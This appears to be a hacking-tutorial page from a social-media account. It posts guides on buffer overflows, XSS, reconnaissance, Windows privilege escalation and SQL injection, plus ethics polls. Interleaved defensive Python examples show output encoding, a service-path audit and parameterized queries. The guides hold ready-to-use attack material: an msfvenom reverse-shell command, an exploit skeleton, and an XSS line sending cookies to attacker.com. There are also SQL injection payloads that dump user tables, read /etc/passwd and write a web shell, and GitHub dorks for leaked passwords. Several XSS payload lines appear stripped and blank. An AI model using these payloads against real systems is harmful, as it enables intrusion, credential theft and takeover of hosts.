Beejay Computers

This page is created with the intention of supporting learners who are passionate about hacking and

02/05/2026

💥 BUFFER OVERFLOW COMPLETE GUIDE

Learn to exploit memory corruption vulnerabilities:

📌 STACK BASICS:
#include <stdio.h>

int main() {
    char buffer[64]; // 64 bytes allocated on the stack
    gets(buffer);    // Vulnerable function: no length limit on input!
    return 0;
}

📌 OVERFLOW MECHANICS:
1. Buffer overflows stack
2. Overwrites return address
3. Points to shellcode in memory

📌 FINDING VULNERABILITY:
# Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
# Send pattern to application
# Find offset with pattern_offset.rb

📌 EXPLOIT STEPS:

1️⃣ GENERATE PATTERN:
msf-pattern_create -l 200

2️⃣ FIND OFFSET:
msf-pattern_offset -l 200 -q "AAAA..."

3️⃣ CONTROL EIP:
offset = 146
buffer = "A" * 146 + "B" * 4 + "C" * 200

4️⃣ FIND BAD CHARS:
# Remove null bytes (\x00)
# Test all chars \x01-\xff
# Analyze which get mangled

5️⃣ FIND JUMP ADDRESS:
# Find address pointing to NOP sled or shellcode
!mona jmp -r esp -cpb "\x00"
# Or use objdump to find gadgets

6️⃣ CREATE EXPLOIT:
#!/usr/bin/python3
import os
offset = 146
ret = b"\x55\x83\x04\x08" # jmp esp address
nop = b"\x90" * 20
shellcode = b"..." # Your payload

buffer = b"A" * offset + ret + nop + shellcode

📌 GENERATE SHELLCODE:
# Using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f python -b "\x00\x0a\x0d"
# Options:
# -f c, python, exe
# -b remove bad chars
# -e encoder

📌 COMMON SHELLCODE LOCATIONS:
# NOP Sled (No Operation)
"\x90" * 20 # Slide to shellcode

# Egg Hunter
nopsled + egg + shellcode
# Use when buffer is small

📌 PRACTICE:
• vulnserver (Windows)
• brainpan (Linux)
• protostar (exploit-exercises)
• tryhackme.com Buffer Overflow room

01/05/2026

🔥 HOT TAKE: Which programming language for hackers?

🅰️ Python (automation, exploits)
🅱️ Bash (quick scripts, Linux)
🅲 C (exploit dev, understanding)
🅳 JavaScript (web hacking)

MY ANSWER: Learn ALL, master ONE!

What's your primary language? 👇

01/05/2026

💬 DISCUSSION: Best way to learn hacking?

I started with:
1. TryHackMe (beginner friendly)
2. PortSwigger Academy (web security)
3. HackTheBox (advanced)
4. OSCP labs (real-world)
5. YouTube tutorials

What's YOUR learning journey been?

Drop your recommendations below! 👇

01/05/2026

πŸ” XSS (CROSS-SITE SCRIPTING) GUIDE

TYPES:

1️⃣ REFLECTED (Immediate)
URL: site.com/search?q=alert(1)
Victim clicks → Script executes

2️⃣ STORED (Persistent)
Saved in database
Executes for ALL visitors
Example: Forum post, comments

3️⃣ DOM-BASED (Client-side)
Vulnerability in JavaScript
No server interaction
Example: document.write(userInput)

TESTING PAYLOADS:

Basic:
alert('XSS')

Image tag:


SVG:


Body tag:


Input tag:


IFRAME:


BYPASS FILTERS:

If blocked:




If alert blocked:
document.location='http://attacker.com/steal?c='+document.cookie


URL Encode:
%3Cscript%3Ealert(1)%3C/script%3E

HTML Encode:
&lt;script&gt;alert(1)&lt;/script&gt;

IMPACT:
• Session hijacking
• Defacement
• Phishing
• Keylogging
• Crypto mining

DEFENSE:
• Input validation
• Output encoding
• Content Security Policy (CSP)
• HttpOnly cookies

PRACTICE: PortSwigger XSS labs, OWASP Juice Shop
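The two defenses the guide names, output encoding and CSP, side by side with the unsafe pattern they replace. This is an added example, not code from the original post; the comment and search inputs are constructed sample strings.

```python
import html
import re

# Constructed attacker-style inputs for a stored comment and a reflected search
# term (sample strings made up for this example, not captured traffic).
COMMENT = "<img src=x onerror=alert(1)>"
SEARCH = '" autofocus onfocus=alert(1) x="'

def encode_html(value: str) -> str:
    """Output-encode untrusted text for HTML element content or a double-quoted
    attribute. quote=True is what makes the attribute case safe: without it a
    stray double quote closes the attribute and the rest becomes new attributes."""
    return html.escape(value, quote=True)

def render_unsafe(comment: str, search: str) -> str:
    """The vulnerable pattern: raw concatenation of user data into markup."""
    return (f'<p class="comment">{comment}</p>\n'
            f'<input type="text" name="q" value="{search}">')

def render_safe(comment: str, search: str) -> str:
    """Hardened form: every untrusted value is encoded at the point of output."""
    return (f'<p class="comment">{encode_html(comment)}</p>\n'
            f'<input type="text" name="q" value="{encode_html(search)}">')

TAG_OPENER = re.compile(r"<[a-zA-Z/]")

def count_tags(fragment: str) -> int:
    """Count tag openers in a rendered fragment. The template itself contributes
    exactly three (<p>, </p>, <input>); anything above that came from user data."""
    return len(TAG_OPENER.findall(fragment))

def csp_header(nonce: str) -> str:
    """Defence in depth: a nonce-based CSP blocks inline handlers such as onerror=
    and onfocus= even when an encoding mistake lets markup through."""
    return ("Content-Security-Policy: default-src 'self'; "
            f"script-src 'nonce-{nonce}'; object-src 'none'; base-uri 'none'")

if __name__ == "__main__":
    print(render_unsafe(COMMENT, SEARCH))   # 4 tag openers: the <img> got in
    print(render_safe(COMMENT, SEARCH))     # 3 tag openers: only the template's
    print(csp_header("r4nd0m"))
```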

01/05/2026

πŸ” RECONNAISSANCE MASTER GUIDE

Information gathering is 80% of hacking:

📌 PASSIVE RECON:

# WHOIS Lookup
whois example.com
whois -h whois.verisign.io "example.com"

# DNS Enumeration
dig example.com ANY
dig @8.8.8.8 example.com
host -t mx example.com
host -t txt example.com

# Subdomain Discovery
amass enum -passive -d example.com
sublist3r -d example.com
findomain -t example.com
assetfinder example.com
subfinder -d example.com

# Virtual Host Discovery
ffuf -w wordlist -H "Host: FUZZ.example.com" example.com

📌 ACTIVE RECON:

# Nmap Scanning
nmap -sV -sC -O -p- -T4 -oA scan.txt example.com
nmap --script vuln example.com

# Web Recon
whatweb example.com
wappalyzer example.com
builtwith example.com

# Directory Busting
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
dirb https://example.com /usr/share/wordlists/dirb/common.txt
ffuf -w wordlist -u https://example.com/FUZZ

# Parameter Discovery
ffuf -w wordlist -u https://example.com/index.php?FUZZ=test

📌 SUBDOMAIN ENUM:

# Subdomains
sublist3r -d example.com -o subs.txt
amass enum -active -d example.com
assetfinder --subs-only example.com > subs.txt

# Combine and verify
amass enum -passive -df subdomains.txt

# Port Scanning Subdomains
nmap -iL subs.txt -p 80,443,8080 -T4

📌 GITHUB RECON:
git clone https://github.com/michenriksen/gitrob.git
gitrob --tokens-file tokens.txt --domains example.com

# GitHub Search
site:github.com "example.com" password
site:github.com "example.com" api_key
site:github.com "example.com" secret

📌 OSINT:
• hunter.io (email discovery)
• shodan.io (exposed devices)
• censys.io (certificates)
• theHarvester -d example.com -b all

📌 CUSTOM WORDLIST:
cewl example.com -m 5 -w wordlist.txt

30/04/2026

💬 DISCUSSION: Ethics in Cybersecurity

You discover a critical vulnerability in a popular app:

What's your next move?

A) Public tweet for clout
B) Sell on dark web
C) Responsible disclosure
D) Bug bounty program
E) Leak to security researchers

DISCUSS: Why did you choose your answer?

30/04/2026

🎯 CTF PLAYLIST: Best Practice Platforms

BEGINNER: PicoCTF, TryHackMe, OverTheWire
INTERMEDIATE: HackTheBox, VulnHub, RootMe
ADVANCED: DEF CON CTF, Google CTF, PlaidCTF

SPECIALIZED:
• Forensics: DFIR Diva
• Web: PortSwigger Academy
• Crypto: CryptoHack
• Reversing: crackmes.one

MY PICK: Start PicoCTF → HTB → Real CTFs

Which platform do you use? 👇

30/04/2026

🪟 WINDOWS PRIVILEGE ESCALATION GUIDE

Escalate from low-privilege to SYSTEM:

📌 ENUMERATION:
whoami /all # User and privileges
whoami /priv # Enabled privileges
net user # All users
net localgroup administrators # Admins
hostname # Computer name
systeminfo # Full system info
ipconfig /all # Network config

📌 FIND EXPLOITS:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# Search at:
# - exploit-db.com
# - metasploit module: post/multi/recon/local_exploit_suggester

📌 ALWAYS INSTALLED ELEVATION (Potato Attacks):
# SeImpersonatePrivilege required
• RottenPotato (older systems)
• SweetPotato (newer)
• JuicyPotato (Windows 7-10)
• PrintSpoofer (Windows 10/Server 2019)

📌 MISSING PATCHES:
wmic qfe list # Installed patches
# Check against known exploits:
# - MS16-032 (Secondary Logon)
# - MS17-010 (EternalBlue)
# - CVE-2019-1388 (HH)

📌 UNQUOTED SERVICE PATHS:
wmic service get name,pathname
# If path has spaces and no quotes, exploit!
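An audit of the `wmic service get name,pathname` listing above that flags unquoted image paths with spaces, lists the locations Windows would try for each, and produces the quoted value to fix them with. This is an added example, not code from the original post; the service names and paths in WMIC_OUTPUT are constructed.

```python
import re

# Constructed sample of `wmic service get name,pathname` output; these services
# and paths are made up for this example, not taken from a real host.
WMIC_OUTPUT = r"""
Name          PathName
GoodSvc       "C:\Program Files\Good Vendor\good.exe" -service
SysSvc        C:\Windows\System32\svchost.exe -k LocalService
WeakSvc       C:\Program Files\Weak Vendor\weak.exe -k netsvcs
NoSpaceSvc    C:\Tools\agent.exe
"""

EXE_RE = re.compile(r"^(.*?\.exe)(.*)$", re.IGNORECASE)

def parse_wmic(output: str) -> list:
    """Split the two-column wmic listing into (name, pathname) pairs."""
    rows = []
    for line in output.strip().splitlines()[1:]:          # skip the header row
        name, path = re.split(r"\s{2,}", line.strip(), maxsplit=1)
        rows.append((name, path))
    return rows

def split_exe(path: str):
    """Return (executable, arguments) for an unquoted image path."""
    m = EXE_RE.match(path)
    return (m.group(1), m.group(2)) if m else (path, "")

def search_candidates(path: str) -> list:
    """Paths Windows tries, in order, for an unquoted image path with spaces:
    each space is a possible end of the executable name. A defender must make
    sure none of these locations is writable by standard users."""
    exe, _ = split_exe(path)
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]

def find_unquoted(output: str) -> list:
    """Service names whose image path is unquoted and contains a space."""
    weak = []
    for name, path in parse_wmic(output):
        if path.startswith('"'):
            continue                                      # already quoted: safe
        exe, _ = split_exe(path)
        if " " in exe:
            weak.append(name)
    return weak

def quote_path(path: str) -> str:
    """Remediated binPath value: the executable quoted, arguments unchanged."""
    exe, args = split_exe(path)
    return f'"{exe}"{args}'
```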

📌 WEAK SERVICE PERMISSIONS:
accesschk.exe -uwcqv "Authenticated Users" *
# Look for SERVICE_ALL_ACCESS

📌 REGISTRY EXPLOITS:
# Check for auto-run programs:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# If writable by user, inject malicious code

📌 SCHEDULED TASKS:
schtasks /query /fo LIST /v
# Look for writable .exe/.dll/.ps1 in task

📌 DLL HIJACKING:
1. Find application loading DLL
2. Check if DLL path is writable
3. Create malicious DLL
4. Place in application directory

📌 AUTOMATED TOOLS:
• winPEAS (github.com/carlospolop)
• Seatbelt (.NET gatherer)
• PowerUp.ps1 (PowerShell)
• SharpUp

📌 GETTING METERPRETER:
# Using existing session
getsystem # Try built-in
# Using RottenPotato
load incognito
execute -cH -f.exe

30/04/2026

🔓 SQL INJECTION DEEP DIVE

DETECTION:
' OR 1=1--
" OR 1=1--
' OR '1'='1
') OR ('1'='1
' UNION SELECT NULL--
' ORDER BY 1--

FIND COLUMN COUNT:
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
(Keep increasing until error)

EXTRACT DATABASE:
' UNION SELECT 1,database(),3--

EXTRACT TABLES:
' UNION SELECT 1,table_name,3 FROM information_schema.tables--

EXTRACT COLUMNS:
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--

DUMP DATA:
' UNION SELECT username,password,email FROM users--

READ FILES:
' UNION SELECT 1,load_file('/etc/passwd'),3--

WRITE FILES:
' UNION SELECT 1,'' INTO OUTFILE '/var/www/shell.php'--

BLIND SQLi:
' AND 1=1-- (true)
' AND 1=2-- (false)
' AND SUBSTRING(version(),1,1)='5'--

TIME-BASED:
' AND SLEEP(5)--
' AND BENCHMARK(10000000,SHA1('test'))--

TOOLS:
• SQLmap (automated)
• Burp Suite (manual)
• sqlninja (post-exploit)

DEFENSE: Parameterized queries!
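The defense line above, worked through: the same login query written with string concatenation and with parameterized placeholders, run against the guide's `' OR 1=1--` and UNION payloads. This is an added example, not code from the original post; the users table and its rows are constructed sample data (plaintext passwords only to keep the example short).

```python
import sqlite3

def build_db() -> sqlite3.Connection:
    """In-memory SQLite database with a constructed users table (sample data only;
    a real system stores password hashes, never plaintext)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "alice@example.com"),
         ("bob", "hunter2", "bob@example.com")],
    )
    return conn

def login_vulnerable(conn, username: str, password: str) -> list:
    """The bug: user input is pasted into the SQL text, so the quote and the `--`
    comment marker in a payload change the query's structure. With
    `' OR 1=1--` the WHERE clause becomes `username = '' OR 1=1` and the
    password check is commented out, so every user matches."""
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]

def login_safe(conn, username: str, password: str) -> list:
    """The fix: placeholders send the values separately from the SQL text, so
    `' OR 1=1--` is compared as a literal username and matches nobody."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

if __name__ == "__main__":
    db = build_db()
    for payload in ["' OR 1=1--", "' UNION SELECT email FROM users--"]:
        print(payload, "->", login_vulnerable(db, payload, "x"),
              "| parameterized:", login_safe(db, payload, "x"))
```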

29/04/2026

🤔 FRIDAY DISCUSSION: Ethics in Hacking

SCENARIO: You find a critical vuln in a popular app.

What do you do?
A) Post on Twitter for clout
B) Sell on dark web
C) Responsible disclosure
D) Leak to researchers first

The RIGHT answer: C

ETHICAL GUIDELINES:
✅ Get written permission
✅ Stay within scope
✅ Report responsibly
✅ Give time to fix (90 days)

What's your disclosure experience? 👇

Address

Tambaram
